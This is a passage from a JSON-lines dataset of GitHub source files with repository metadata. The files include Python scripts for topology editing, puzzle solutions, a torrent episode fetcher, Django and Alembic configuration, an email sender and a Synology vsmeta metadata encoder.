integer.\")\n\n if isinstance(n, numbers.Integral):\n # interpret as number of steps (default)\n result = yield from plan(*args, **kwargs)\n elif isinstance(n, numbers.Real):\n # correct step size sign\n n = np.sign(stop - start) * np.abs(n)\n if np.abs(n) > np.abs(stop - start):\n raise ValueError(f\"Step size provided {n} greater \"\n \"than the range provided \"\n f\"{np.abs(stop - start)}.\")\n step_list = utils.orange(start, stop, n)\n n_steps = len(step_list)\n\n if n_steps == 0:\n raise ValueError(\"Number of steps is 0 with the \"\n \"provided range and step size.\")\n\n result = yield from plan(det_list, motor, start,\n step_list[-1], n_steps,\n **kwargs)\n\n return result\n\n return inner\n\n\ndaq_during_decorator = make_decorator(daq_during_wrapper)\n","repo_name":"pcdshub/nabs","sub_path":"nabs/preprocessors.py","file_name":"preprocessors.py","file_ext":"py","file_size_in_byte":13522,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"20337122199","text":"import re\nimport sys\n# Writing to file\n#file1 = open('processed.top', 'w')\n\nprint ('Number of arguments:', len(sys.argv), 'arguments.')\nprint ('Argument List:', str(sys.argv))\nprint(\"Arguments passed:\", end = \" \")\nfor i in range(1, len(sys.argv)):\n print(sys.argv[i], end = \" \")\n\nif (len(sys.argv) < 2):\n\tprint ('\\nUsage: appendUnderscoreToSolute.py your_topology_file.top soluteMolecule1 soluteMolecule2 ...')\n\tsys.exit(1)\n\ndotTop = '.top'\nif(dotTop not in sys.argv[1]):\n\tprint ('\\nUsage: appendUnderscoreToSolute.py your_topology_file.top soluteMolecule1 soluteMolecule2 ...')\n\tsys.exit(1)\n\ninputfilename = sys.argv[1]\noutputfilename = sys.argv[1][:-4] + '_.top'\nprint(\"outputfilename: \", outputfilename)\nwith open(inputfilename) as inf:\n content = inf.readlines()\n\ninf.close()\n\nblank=''\natomTypeHeader = '[ moleculetype ]'\n#\\n; Name nrexcl\\n'\n\nprint(\"File length: \",len(content))\nenteredAtomSection = False\n\nmoleculeToScale = ''\nblank = '\\n'\natoms = \"[ atoms ]\"\nbonds = \"[ bonds ]\"\nlistOfFirstAndLastIndices = []\nfirstLineOfAtoms = 0\nlastLineOfAtoms = 0\nenteredAtomSection = False\ncounterOfMoleculesAppended = 0\nlistOfMoleculesAppended = []\n# Get (start, end) tuples of atom section of solute molecules\nfor i in range(2, len(sys.argv)):\n\tprint(\"Scaling \", sys.argv[i])\n\tmoleculeToScale = sys.argv[i]\n\n\tfor j in range(0, len(content)):\n\t\tif moleculeToScale in content[j]: \n\t\t\tif content[j+1] is blank and atoms in content[j+2]:\n\t\t\t\tfirstLineOfAtoms = j + 5\n\t\t\t\tenteredAtomSection = True\n\t\tif enteredAtomSection and bonds in content[j]:\n\t\t\tlastLineOfAtoms = j - 2\n\t\t\ttemp = (firstLineOfAtoms, lastLineOfAtoms)\n\t\t\tlistOfFirstAndLastIndices.append(temp)\n\t\t\tenteredAtomSection = False\n\t\t\tcounterOfMoleculesAppended = counterOfMoleculesAppended + 1\n\t\t\tlistOfMoleculesAppended.append(moleculeToScale)\n\n# Replace character immediately following atom name with a '_'\nif (counterOfMoleculesAppended != len(sys.argv) - 2):\n\tprint(\"Couldn't find all molecules!\")\n\tprint(\"I only found : \", listOfMoleculesAppended)\n\tprint(\"Terminating without appending the underscore.\")\n\tprint(\"Correct your arguments or topology file!\")\n\tsys.exit(1)\n\nindex = 17\nprint(\"Tuples of (start, stop) of atom sections: \",listOfFirstAndLastIndices)\nfor a_tuple in listOfFirstAndLastIndices:\n\tfor i in range(a_tuple[0], a_tuple[1]+1):\n\t\tif(content[i][0] != ';'):\n\t\t\tcontent[i] = content[i][:index] + '_' + content[i][index + 1:]\n\nof = open(outputfilename, \"w\")\nof.writelines(content)\nof.close()\nprint(\"\\nAppended an underscore to all atoms in the molecules you provided!\")\nprint('\\x1b[6;30;42m' + 'Success!' + '\\x1b[0m')\n\n","repo_name":"GregorySchwing/hremd-idp","sub_path":"hremd-inputs/mycmax/2_hremd_setup/appendUnderscoreToSolute.py","file_name":"appendUnderscoreToSolute.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"4511717703","text":"import numpy as np\n\nfrom functools import reduce\nfrom math import inf\nfrom sympy.ntheory.modular import solve_congruence\n\nwith open(\"input\") as f:\n t, busses = [line.strip() for line in f.readlines()]\n t = int(t)\n busses = busses.split(',')\n\n# part I\nbusses_active = [int(b) for b in busses if b.isdigit()]\nW = np.array([[bus, bus - t % bus] for bus in busses_active])\nearliest = np.argmin(W, 0)[1]\nprint(np.prod(W[earliest]))\n\n# part II // Chinese Remainder Theorem\na = [int(b) - i for i, b in enumerate(busses) if b.isdigit()]\nprint(solve_congruence(*list(zip(a, busses_active)))[0])\n","repo_name":"madsthoisen/advent_of_code","sub_path":"2020/dec13/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21352855437","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''\n检测一个数组是否是一棵二叉搜索树的前序遍历,若是则返回True,否则返回false\n'''\n# 二叉搜索树:左子树小于根,右子树大于根\n# 先序遍历:先根->左子->右子\ndef f(lst):\n root = float('-inf')\n stack = []\n for v in lst:\n # if right son < root -> False\n if v < root:\n return False\n while len(stack) > 0 and stack[-1] < v:\n # v 做右子树\n root = stack.pop() # 栈顶出栈作为根\n stack.append(v)\n return True\n\nlst = [5, 3, 2, 4, 6]\nprint(f(lst))\n","repo_name":"SeanLee97/datastruct_and_algorithms","sub_path":"tree/verify_preorder_of_BST.py","file_name":"verify_preorder_of_BST.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"38590240938","text":"import pandas as pd\n\ndata = {\n \"country\": [\"china\", \"japan\", \"korea\", \"usa\"],\n \"gdp\": [1409250000, 516700000, 169320000, 2041280000],\n \"population\": [141500, 12718, 5180, 32676],\n}\n\ncountry = pd.DataFrame(data)\ncountry = country.set_index(\"country\")\n\nprint(country.shape) # (4, 2)\nprint(country.size) # 8\nprint(country.ndim) # 2\nprint(country.values)\n\ncountry.index.name = \"Country\"\ncountry.columns.name = \"Info\"\n\nprint(country.index)\n# Index(['china', 'japan', 'korea', 'usa'], dtype='onject', name='Country')\nprint(country.columns)\n# Index(['gdp', 'population'], dtype='object', name='Info')\n","repo_name":"beomjunlim/Python_Udemy","sub_path":"pandas.py","file_name":"pandas.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12405366723","text":"import argparse\nimport sys\n\nfrom models.fetcher import EpisodeFetcher\nfrom models.tvdb import TVDBAPI\n\n\nconfig_fp = \"config.ini\"\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--add-series\", help=\"Search string of Series name to add\")\nparser.add_argument(\"--add-eps\", action=\"store_true\",\n help=\"Add new episodes\")\nparser.add_argument(\"--series-ids\", nargs=\"*\", type=int,\n help=\"Limit to series_ids\")\nparser.add_argument(\"--download\", action=\"store_true\",\n help=\"Add torrents and initiate tranfer, limit to only --series-ids if desired\")\nparser.add_argument(\"--pause-transfer\", action=\"store_true\",\n help=\"Do not immediately start torrent transfers\")\nparser.add_argument(\"--status\", action=\"store_true\",\n help=\"Check for any completed transfers and process them\")\nparser.add_argument(\"--view-series\", help=\"View added series info\",\n action=\"store_true\")\nparser.add_argument(\n \"--shortened-searches\",\n help=\"Search for episodes using a shortened episode name\",\n action=\"store_true\",\n)\n\n\nargs = parser.parse_args()\n\nif __name__ == \"__main__\":\n fetcher = EpisodeFetcher(\n config_fp,\n shortened_searches=args.shortened_searches\n )\n if args.view_series:\n api = TVDBAPI(config_fp)\n api.view_all_series()\n sys.exit(0)\n\n if args.series_ids is None:\n series_ids = []\n\n if args.add_series or args.add_eps:\n api = TVDBAPI(config_fp)\n api.login()\n\n if args.add_series:\n api.search_and_add_new_series(args.add_series)\n if args.add_eps:\n api.add_series_episodes(series_ids=args.series_ids)\n\n if args.download:\n fetcher.download_all_non_complete_episodes(\n series_ids=args.series_ids,\n pause_transfer=args.pause_transfer\n )\n if args.status:\n fetcher.check_downloading_torrents()\n\n","repo_name":"wallawaz/torrent_automator","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42718597388","text":"class Solution:\n def longestCommonPrefix(self, strs: List[str]) -> str:\n strs.sort()\n \n ans =\"\"\n \n for i in range(min(len(strs[-1]), len(strs[0]))):\n if strs[0][i] == strs[-1][i]:\n ans += strs[0][i]\n \n else:\n break\n \n return ans","repo_name":"vinhocent/leetcode","sub_path":"0014-longest-common-prefix/0014-longest-common-prefix.py","file_name":"0014-longest-common-prefix.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38424975408","text":"class Course:\n \"\"\"课程\"\"\"\n\n def __init__(self, course_name, course_id, credit, instructor_name, address, description):\n self.__course_name = course_name\n self.__course_id = course_id\n self.__credit = credit\n self.__instructor_name = instructor_name\n self.__address = address\n self.__description = description\n\n def get_course_name(self):\n return self.__course_name\n\n def __str__(self):\n string = 'Course_name:' + self.__course_name + '\\n'\n string += 'Course_id:' + self.__course_id + '\\n'\n string += 'Credit:' + self.__credit + '\\n'\n string += 'Instructor_name:' + self.__instructor_name + '\\n'\n string += 'Address:' + self.__address + '\\n'\n string += 'Description:' + self.__description + '\\n'\n return string\n\n\nif __name__ == '__main__':\n fi = open('course.txt', 'r')\n course_list = [] # 课程对象列表\n while True:\n line1 = fi.readline().strip() # 读取1行\n if line1 == '':\n break\n line2 = fi.readline().strip() # 读取1行\n tem_list = line1.split(sep=\",\")\n course_list.append(\n Course(tem_list[0], tem_list[1], tem_list[2], tem_list[3], tem_list[4], line2)) # 将实例化的课程对象添加到课程对象列表中\n fi.close()\n\n # 打印保存的课程对象数组\n for course in course_list:\n print(course)\n","repo_name":"singi2016cn/free_coding","sub_path":"baidu/python的文档导入和属性问题/course.py","file_name":"course.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4656157249","text":"import filecmp\nimport os\nimport unittest\n\nfrom quatradis.tisp.generator.from_values import PlotFromValuesGenerator\nfrom quatradis.tisp.parser import PlotParser\n\ndata_dir = os.path.join('data', 'tisp', 'create')\n\n\nclass TestPlotGenerator(unittest.TestCase):\n\n def test_forward_only(self):\n filename = os.path.join(data_dir, 'test_plotgen')\n p = PlotFromValuesGenerator([0, 0, 0, 0, 0, 1, 1, 3], [], filename)\n self.assertTrue(p.construct_file())\n\n self.assertTrue(os.path.exists(filename))\n self.assertTrue(filecmp.cmp(os.path.join(data_dir, 'expected_plotgen'), filename))\n os.remove(filename)\n\n def test_generate_and_read(self):\n filename = os.path.join(data_dir, 'plot.test')\n p = PlotFromValuesGenerator([0, 0, 0, 0, 0, 1, 1, 3], [9, 9, 0, 9, 9, 1, 1, 3], filename)\n p.construct_file()\n\n d = PlotParser(filename, 0)\n self.assertTrue(self.check_arrays_equal(d.forward, [0, 0, 0, 0, 0, 1, 1, 3]))\n self.assertTrue(self.check_arrays_equal(d.reverse, [9, 9, 0, 9, 9, 1, 1, 3]))\n self.assertTrue(self.check_arrays_equal(d.combined, [9, 9, 0, 9, 9, 2, 2, 6]))\n\n os.remove(filename)\n\n def check_arrays_equal(self, array1, array2):\n for i, val in enumerate(array1):\n if array1[i] != array2[i]:\n print(str(array1[i]) + \" not equal to \" + str(array2[i]))\n return False\n return True\n","repo_name":"quadram-institute-bioscience/QuaTradis","sub_path":"tests/py/tisp/generator/from_values_test.py","file_name":"from_values_test.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"72705995369","text":"import numpy as np\n\nfrom matplotlib.patches import Circle, Wedge, Polygon\nfrom matplotlib.collections import PatchCollection\nfrom matplotlib.widgets import LassoSelector\n\ndef centerpoint_listener(iss, pointlist):\n def onclick_centerpoints(event):\n xi, yi = int(event.xdata + 0.5), int(event.ydata + 0.5)\n zi = iss.idx[0]\n # print('button=%d, x=%d, y=%d, xdata=%f, ydata=%f' % (event.button, event.x, event.y, event.xdata, event.ydata))\n print(zi, yi, xi)\n if event.key=='c':\n print('added! ', event.key)\n pointlist.append([zi,yi,xi])\n cid = iss.fig.canvas.mpl_connect('button_press_event', onclick_centerpoints)\n return cid\n # return onclick_centerpoints\n\ndef centerpoints2slices(img, pointlist, dx=128):\n slices = []\n for pt in pointlist:\n img2 = img[pt[0]]\n img2 = np.pad(img2, dx, mode='reflect')\n sl = slice(pt[1], pt[1]+2*dx), slice(pt[2], pt[2]+2*dx)\n slices.append(img2[sl])\n return np.array(slices)\n\ndef lasso_randomPolygons(ax, polylist):\n def onselect(verts):\n p = Polygon(verts, fc=(random(), random(), random(), 0.25), rasterized=True)\n ax.add_patch(p)\n polylist.append(p)\n # mask = nxutils.points_inside_poly\n lasso = LassoSelector(ax, onselect)\n return lasso\n\ndef lasso_draw(ax, mask):\n def onselect(verts):\n # p = Polygon(verts, fc=(random(), random(), random(), 0.25), rasterized=True)\n # ax.add_patch(p)\n verts = np.array(verts, dtype=np.int)\n mask[verts[:,0], verts[:,1]] = mask.max() + 1\n # mask = nxutils.points_inside_poly\n lasso = LassoSelector(ax, onselect)\n return lasso\n\n","repo_name":"mpicbg-csbd/detsegtra","sub_path":"segtools/annotation.py","file_name":"annotation.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2274727259","text":"# https://adventofcode.com/2021/day/17\n\nimport re\nfrom collections import namedtuple, deque\nfrom itertools import product\nfrom pathlib import Path\n\n\nPosition = namedtuple(\"Position\", \"x y\")\nTarget = namedtuple(\"Target\", \"xmin xmax ymin ymax\")\n\n\ndef load_data(path):\n with open(path) as fd:\n coords = [int(coord) for coord in re.findall(r\"-?\\d+\", fd.read())]\n return Target(*coords)\n\n\ndef launch_probe(vx, vy):\n position = Position(0, 0)\n while True:\n yield position\n position = Position(position.x + vx, position.y + vy)\n vx, vy = max(0, vx - 1), vy - 1\n\n\ndef is_hit(vx, vy, target):\n for position in launch_probe(vx, vy):\n if target.xmin <= position.x <= target.xmax and target.ymin <= position.y <= target.ymax:\n return True\n elif position.x > target.xmax or position.y < target.ymin:\n return False\n\n\ndef get_acc_vy_range(vx, vy_init, target):\n vy_range = deque()\n for vy in range(vy_init, -target.ymin + 1):\n if is_hit(vx, vy, target):\n vy_range.appendleft(vy)\n return vy_range\n\n\ndef get_acc_velocities(target):\n acc_velocities = []\n for vx in range(0, target.xmax + 1):\n for vy in range(target.ymin, -target.ymin):\n if is_hit(vx, vy, target):\n acc_velocities.append((vx, vy))\n return acc_velocities\n\n\ndef part_one(data):\n return data.ymin * (data.ymin + 1) // 2\n\n\ndef part_two(data):\n velocities = get_acc_velocities(data)\n return len(velocities)\n\n\nif __name__ == \"__main__\":\n input_dir = Path().resolve().parent / \"inputs/17\"\n samples = load_data(input_dir / \"samples.in\")\n data = load_data(input_dir / \"data.in\")\n\n assert part_one(samples) == 45\n assert part_two(samples) == 112\n\n print(part_one(data))\n print(part_two(data))\n","repo_name":"koczanm/advent-of-code","sub_path":"2021/python/day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29582568912","text":"from apps.log_databus.handlers.collector_scenario.base import CollectorScenario\nfrom django.utils.translation import ugettext as _\n\n\nclass CustomCollectorScenario(CollectorScenario):\n @classmethod\n def get_built_in_config(cls, es_version=\"5.X\"):\n \"\"\"\n 获取采集器标准字段\n \"\"\"\n return {\n \"option\": {\n \"es_unique_field_list\": [\"cloudId\", \"serverIp\", \"path\", \"gseIndex\", \"iterationIndex\"],\n \"separator_node_source\": \"\",\n \"separator_node_action\": \"\",\n \"separator_node_name\": \"\",\n },\n \"fields\": [\n {\n \"field_name\": \"__ext\",\n \"field_type\": \"object\",\n \"tag\": \"dimension\",\n \"alias_name\": \"ext\",\n \"description\": _(\"额外信息字段\"),\n \"option\": {\"es_type\": \"object\", \"es_include_in_all\": False}\n if es_version.startswith(\"5.\")\n else {\"es_type\": \"object\"},\n },\n {\n \"field_name\": \"cloudId\",\n \"field_type\": \"float\",\n \"tag\": \"dimension\",\n \"alias_name\": \"cloudid\",\n \"description\": _(\"云区域ID\"),\n \"option\": {\"es_type\": \"integer\", \"es_include_in_all\": False}\n if es_version.startswith(\"5.\")\n else {\"es_type\": \"integer\"},\n },\n {\n \"field_name\": \"serverIp\",\n \"field_type\": \"string\",\n \"tag\": \"dimension\",\n \"alias_name\": \"ip\",\n \"description\": \"ip\",\n \"option\": {\"es_type\": \"keyword\", \"es_include_in_all\": True}\n if es_version.startswith(\"5.\")\n else {\"es_type\": \"keyword\"},\n },\n {\n \"field_name\": \"path\",\n \"field_type\": \"string\",\n \"tag\": \"dimension\",\n \"alias_name\": \"filename\",\n \"description\": _(\"日志路径\"),\n \"option\": {\"es_type\": \"keyword\", \"es_include_in_all\": True}\n if es_version.startswith(\"5.\")\n else {\"es_type\": \"keyword\"},\n },\n {\n \"field_name\": \"gseIndex\",\n \"field_type\": \"float\",\n \"tag\": \"dimension\",\n \"alias_name\": \"gseindex\",\n \"description\": _(\"gse索引\"),\n \"option\": {\"es_type\": \"long\", \"es_include_in_all\": False}\n if es_version.startswith(\"5.\")\n else {\"es_type\": \"long\"},\n },\n {\n \"field_name\": \"iterationIndex\",\n \"field_type\": \"float\",\n \"tag\": \"dimension\",\n \"alias_name\": \"iterationindex\",\n \"description\": _(\"迭代ID\"),\n \"flat_field\": True,\n \"option\": {\"es_type\": \"integer\", \"es_include_in_all\": False}\n if es_version.startswith(\"5.\")\n else {\"es_type\": \"integer\"},\n },\n ],\n \"time_field\": {\n \"field_name\": \"dtEventTimeStamp\",\n \"field_type\": \"timestamp\",\n \"tag\": \"dimension\",\n \"alias_name\": \"utctime\",\n \"description\": _(\"数据时间\"),\n \"option\": {\n \"es_type\": \"date\",\n \"es_include_in_all\": False,\n \"es_format\": \"epoch_millis\",\n \"time_format\": \"yyyy-MM-dd HH:mm:ss\",\n \"time_zone\": 0,\n }\n if es_version.startswith(\"5.\")\n else {\n \"es_type\": \"date\",\n \"es_format\": \"epoch_millis\",\n \"time_format\": \"yyyy-MM-dd HH:mm:ss\",\n \"time_zone\": 0,\n },\n },\n }\n","repo_name":"TencentBlueKing/bk-log","sub_path":"apps/log_databus/handlers/collector_scenario/custom.py","file_name":"custom.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"53"} +{"seq_id":"32594521456","text":"\"\"\"Added fields to sessions\n\nRevision ID: 2d53a67e4d71\nRevises: ea4c6f39f70f\nCreate Date: 2020-03-24 17:15:10.895056\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '2d53a67e4d71'\ndown_revision = 'ea4c6f39f70f'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('sessions', sa.Column('session_end', sa.DateTime(), nullable=True))\n op.add_column('sessions', sa.Column('session_start', sa.DateTime(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('sessions', 'session_start')\n op.drop_column('sessions', 'session_end')\n # ### end Alembic commands ###\n","repo_name":"Dakhaas-HU/recommendation-engine","sub_path":"alembic/versions/2d53a67e4d71_added_fields_to_sessions.py","file_name":"2d53a67e4d71_added_fields_to_sessions.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6958660097","text":"from django.urls import path, include\nfrom django.contrib import admin\nfrom django.urls import path\n# from djoser.views import UserViewSet\nfrom rest_framework.routers import DefaultRouter\nfrom calendars.urls import router as calendarrouter\nfrom accounts.urls import router as accountsrouter\n\nrouter = DefaultRouter()\n\nrouter.registry.extend(calendarrouter.registry)\nrouter.registry.extend(accountsrouter.registry)\n# router.register('users', UserViewSet, basename=\"users\")\n\n\ndef is_route_selected(url_pattern):\n \"\"\"Add routes here..\"\"\"\n\n urls = [\n \"users/set_username/\",\n \"users/set_email/\",\n \"users/reset_email_confirm/\",\n ]\n for u in urls:\n match = url_pattern.resolve(u)\n if match:\n return False\n return True\n\n\n# Filter router URLs removing unwanted ones\nselected_user_routes = list(filter(is_route_selected, router.urls))\n\nurlpatterns = [\n path('', include(router.urls)),\n path('admin/', admin.site.urls),\n path('calendars/', include('calendars.urls')),\n path('accounts/', include('accounts.urls')),\n]\n# + selected_user_routes\n","repo_name":"dnmac/django-rest-calendar-djoser","sub_path":"project/project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8630411775","text":"import smtplib, ssl\nfrom config import sender_email, receiver_email, password\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom email.header import Header\n\n\ndef send_message(type, email, phone='', name='', text=''):\n\tport = 465 # для SSL подключения\n\tsmtp_server = \"smtp.gmail.com\"\n\t\n\tmsg = MIMEMultipart('alternative')\n\tmsg.set_charset('utf8')\n\tmsg['FROM'] = sender_email\n\tmsg['To'] = receiver_email\n\n\tif type == 'bid':\n\t\tbody = '''\n\t\t\tEmail: {0}
\n\t\t\tPhone: {1}
\n\t\t\tName: {2}
\n\t\t\t

Message



\n\t\t\t{3}\n\t\t'''.format(email, phone, name, text)\n\t\tmsg['Subject'] = Header('New bid!'.encode('utf-8'),\n\t\t 'UTF-8'\n\t\t).encode()\n\telif type == 'subscribe':\n\t\ttext = 'This person has subscribed to newsletter.'\n\t\tbody = '''\n\t\t\tEmail: {0}
\n\t\t\t

{1}


\n\t\t'''.format(email, text)\n\t\tmsg['Subject'] = Header('New subscriber!'.encode('utf-8'),\n\t\t 'UTF-8'\n\t\t).encode()\n\t\tmsg['To'] = receiver_email\n\t_attach = MIMEText(body.encode('utf-8'), 'html', 'UTF-8') \n\tmsg.attach(_attach)\t\n\n\tcontext = ssl.create_default_context()\n\twith smtplib.SMTP_SSL(smtp_server, port, context=context) as server:\n\t\tserver.login(sender_email, password)\n\t\tmsg.attach(_attach)\n\t\tserver.sendmail(sender_email, receiver_email, msg.as_string())\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"E6YJI6EK/tour-plan","sub_path":"mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21658081715","text":"# Problem Link : https://leetcode.com/problems/count-square-submatrices-with-all-ones/\n\n\nclass Solution:\n def countSquares(self, matrix: List[List[int]]) -> int:\n s = sum(matrix[0])\n for i in range(1, len(matrix)):\n for j in range(1, len(matrix[0])):\n if matrix[i][j] == 1:\n matrix[i][j] = min(matrix[i-1][j], matrix[i-1][j-1], matrix[i][j-1])+1\n s += sum(matrix[i])\n return s\n","repo_name":"vidhikhathuria/MayLeetcodeChallenge","sub_path":"leetcode0307.py","file_name":"leetcode0307.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3425385449","text":"import base64\nimport hashlib\nimport time\nimport bitstring\n\n\ndef trim(string: str, limit: int):\n ''' Trim string to fit upperlimit\n\n '''\n ret = string\n while len(ret.encode(\"utf-8\")) > limit:\n ret = ret[:-1]\n return ret\n\n\ndef int2bytes(integer: int):\n ''' Encode integer as bytes with vsmeta format\n\n eg: 128 => b'0x8001'\n 127 => b'0x7f'\n '''\n bs = bitstring.BitStream()\n while integer >= 128:\n # Mark highest digit of uint8 with 0x80\n bs.append(((integer % 128) | 0x80).to_bytes(1, 'little'))\n integer = integer >> 7\n bs.append(integer.to_bytes(1, 'little'))\n return bs.bytes\n\n\ndef str2bytes(string: str):\n ''' Encode string as bytes with vsmeta format\n\n bytes: [toBytes(len), string]\n '''\n bs = bitstring.BitStream()\n bs.append(int2bytes(len(string.encode(\"utf-8\"))))\n bs.append(string.encode(\"utf-8\"))\n return bs.bytes\n\n\ndef img2bytes(image: bytes):\n ''' Encode image as bytes with vsmeta format\n\n bytes: str2bytes(base64 + \\\\n every 76 chars)\n '''\n b64_bytes = base64.b64encode(image)\n\n out_str = ''\n count = 0\n for chr in b64_bytes.decode():\n if count == 76:\n count = 0\n out_str += '\\n'\n out_str += chr\n count += 1\n bs = bitstring.BitStream()\n bs.append(str2bytes(out_str))\n return bs.bytes\n\nclass VSMETAEncoder:\n\n TAG_FILE_HEADER_MOVIE = b'\\x08\\x01'\n\n TAG_SHOW_TITLE = b'\\x12'\n TAG_SHOW_TITLE2 = b'\\x1A'\n TAG_EPISODE_TITLE = b'\\x22'\n TAG_YEAR = b'\\x28'\n TAG_EPISODE_RELEASE_DATE = b'\\x32'\n TAG_EPISODE_LOCKED = b'\\x38'\n TAG_CHAPTER_SUMMARY = b'\\x42'\n TAG_EPISODE_META_JSON = b'\\x4A'\n TAG_GROUP1 = b'\\x52'\n TAG_CLASSIFICATION = b'\\x5A'\n TAG_RATING = b'\\x60'\n TAG_EPISODE_THUMB_DATA = b'\\x8a'\n TAG_EPISODE_THUMB_MD5 = b'\\x92'\n TAG_GROUP2 = b'\\xAA'\n\n TAG1_CAST = b'\\x0A'\n TAG1_DIRECTOR = b'\\x12'\n TAG1_GENRE = b'\\x1A'\n TAG1_WRITER = b'\\x22'\n\n TAG2_BACKDROP_DATA = b'\\x0a'\n TAG2_BACKDROP_MD5 = b'\\x12'\n TAG2_TIMESTAMP = b'\\x18'\n\n ext = \".vsmeta\"\n\n def __init__(self):\n pass\n\n def encode(self, video: dict):\n ''' encode video info as vsmeta format\n\n return bytes that encode using vsmeta format \n\n VSMETA is appliable in Synology Video Station\n '''\n bs = bitstring.BitStream()\n\n # Header\n bs.append(self.TAG_FILE_HEADER_MOVIE)\n\n # Main Title\n bs.append(self.TAG_SHOW_TITLE)\n bs.append(str2bytes(trim(video.get(\"designatio\"), 255)))\n bs.append(self.TAG_SHOW_TITLE2)\n bs.append(str2bytes(trim(video.get(\"title\"), 255)))\n\n # Title\n bs.append(self.TAG_EPISODE_TITLE)\n bs.append(str2bytes(trim(video.get(\"title\"), 255)))\n\n # Date\n bs.append(self.TAG_YEAR)\n if len(video.get(\"date\")) > 4:\n bs.append(int2bytes(int(video.get(\"date\")[:4])))\n bs.append(self.TAG_EPISODE_RELEASE_DATE)\n bs.append(str2bytes(video.get(\"date\")))\n else:\n bs.append(int2bytes(0))\n\n # Locked (not update from internet)\n bs.append(self.TAG_EPISODE_LOCKED)\n bs.append(b\"\\x01\")\n\n # Summary\n if (len(video.get(\"outline\")) > 0):\n bs.append(self.TAG_CHAPTER_SUMMARY)\n bs.append(str2bytes(video.get(\"outline\")))\n\n # Meta json (null)\n bs.append(self.TAG_EPISODE_META_JSON)\n bs.append(str2bytes(\"null\"))\n\n # Group Info\n info = bitstring.BitStream()\n # Cast\n for actor in video.get(\"cast\"):\n info.append(self.TAG1_CAST)\n info.append(str2bytes(actor))\n # Director\n info.append(self.TAG1_DIRECTOR)\n info.append(str2bytes(video.get(\"director\")))\n # Genre\n for genre in video.get(\"genres\"):\n info.append(self.TAG1_GENRE)\n info.append(str2bytes(genre))\n info.append(self.TAG1_WRITER)\n info.append(str2bytes(video.get(\"maker\")))\n # End of Group\n bs.append(self.TAG_GROUP1)\n bs.append(int2bytes(len(info.bytes)))\n bs.append(info)\n\n # Classification\n if len(video.get(\"mpaa\")) > 0:\n bs.append(self.TAG_CLASSIFICATION)\n bs.append(str2bytes(video.get(\"mpaa\")))\n\n # Rating\n if len(video.get(\"review\")) > 0:\n bs.append(self.TAG_RATING)\n bs.append(int2bytes(int(float(video.get(\"review\")) * 10)))\n\n # Poster (BASE64 + MD5)\n if len(video.get('poster')) > 0:\n bs.append(self.TAG_EPISODE_THUMB_DATA)\n bs.append(b\"\\x01\")\n bs.append(img2bytes(video.get('poster')))\n bs.append(self.TAG_EPISODE_THUMB_MD5)\n bs.append(b\"\\x01\")\n bs.append(str2bytes(hashlib.md5(video.get('poster')).hexdigest()))\n\n # Group Info\n info = bitstring.BitStream()\n # Background (BASE64 + MD5)\n if len(video.get('fanart')) > 0:\n info.append(self.TAG2_BACKDROP_DATA)\n info.append(img2bytes(video.get('fanart')))\n info.append(self.TAG2_BACKDROP_MD5)\n info.append(str2bytes(hashlib.md5(video.get('fanart')).hexdigest()))\n info.append(self.TAG2_TIMESTAMP)\n info.append(int2bytes(int(time.time() // 1000)))\n # End of Group\n bs.append(self.TAG_GROUP2)\n bs.append(b'\\x01')\n bs.append(int2bytes(len(info.bytes)))\n bs.append(info)\n\n return bs.bytes\n","repo_name":"Lqlsoftware/avutil","sub_path":"avutil/encoder/vsmeta.py","file_name":"vsmeta.py","file_ext":"py","file_size_in_byte":5506,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"53"} 